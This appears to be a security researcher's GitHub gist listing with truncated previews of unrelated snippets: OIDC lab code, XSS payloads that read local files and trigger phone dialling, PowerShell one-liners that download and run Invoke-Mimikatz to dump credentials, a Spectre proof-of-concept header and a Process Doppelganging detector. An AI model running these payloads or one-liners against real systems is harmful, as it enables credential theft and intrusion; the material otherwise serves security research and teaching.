
Abdessamad TEMMAR TmmmmmR

  • Paris
def extract_http_request(message: dict) -> HttpRequest:
request_header = message.get('requestHeader', '')
request_body = message.get('requestBody', '')
# Split header into lines and parse the request line
lines = request_header.split('\r\n')
request_line = lines[0] if lines else ''
parts = request_line.split(' ')
if len(parts) < 3:
raise ValueError("Invalid HTTP request line")

Lab 1 : OIDC

This lab demonstrates how OpenID Connect works step by step and the available settings within Keycloak.

  • Use the simulator to build an authentication URL and see how redirection works.
  • Observe each step of the flow and the data exchanged with Keycloak.
  • Learn how to define custom attributes and control access to them using scopes.

👉 Lab URL with self-check: https://labs.keycloak.academy/lab/{{yourRealm}}/oidc-playground

package com.example.demo;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
@Controller
const express = require('express');
const session = require('express-session');
const cors = require('cors');
const jwt = require('jsonwebtoken');
// Create the Express application that the rest of the file configures.
const app = express();
// NOTE(review): cors() is called with no options, and the cors package's
// default answers every origin (Access-Control-Allow-Origin: *). Fine for a
// local demo; pass an `origin` allowlist before exposing this service.
app.use(cors());
// Memory store for sessions
// NOTE(review): express-session documents MemoryStore as not designed for
// production: sessions live only in this process's memory, are lost on restart
// and are not shared between instances. Use a persistent store outside a lab.
const memoryStore = new session.MemoryStore();
{
"realm": "myrealm",
"enabled": true,
"requiredCredentials": [
"password"
],
"users": [
{
"username": "alice",
"enabled": true,
<script>document.location='tel://1123456789'<script>
<script> a = new XMLHttpRequest(); a.open('GET','file:///private/var/wireless/Library/Databases/DataUsage.sqlite', true); a.send();alert(a.responseText);</script>
<script> a = new XMLHttpRequest(); a.open('GET','file:///etc/hosts', false); a.send();alert(a.responseText);</script>
<iframe src="tel://1123456789"></iframe>
"""
A simple selenium test example written by python
"""
import unittest
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
class TestTemplate(unittest.TestCase):
"""Include test cases on a given url"""
TmmmmmR / Quick-Mimikatz
Created March 16, 2018 02:14 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
*NOTE - These one-liners pull from public GitHub repos that are not under my control, and they run whatever the referenced branch contains at download time. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc 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
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
TmmmmmR / spectre.c
Last active January 5, 2018 22:16 — forked from rootkea/spectre.c
PoC from Spectre Attacks: Exploiting Speculative Execution (https://spectreattack.com/spectre.pdf)
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
function Get-Doppelgangers
{
<#
.SYNOPSIS
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause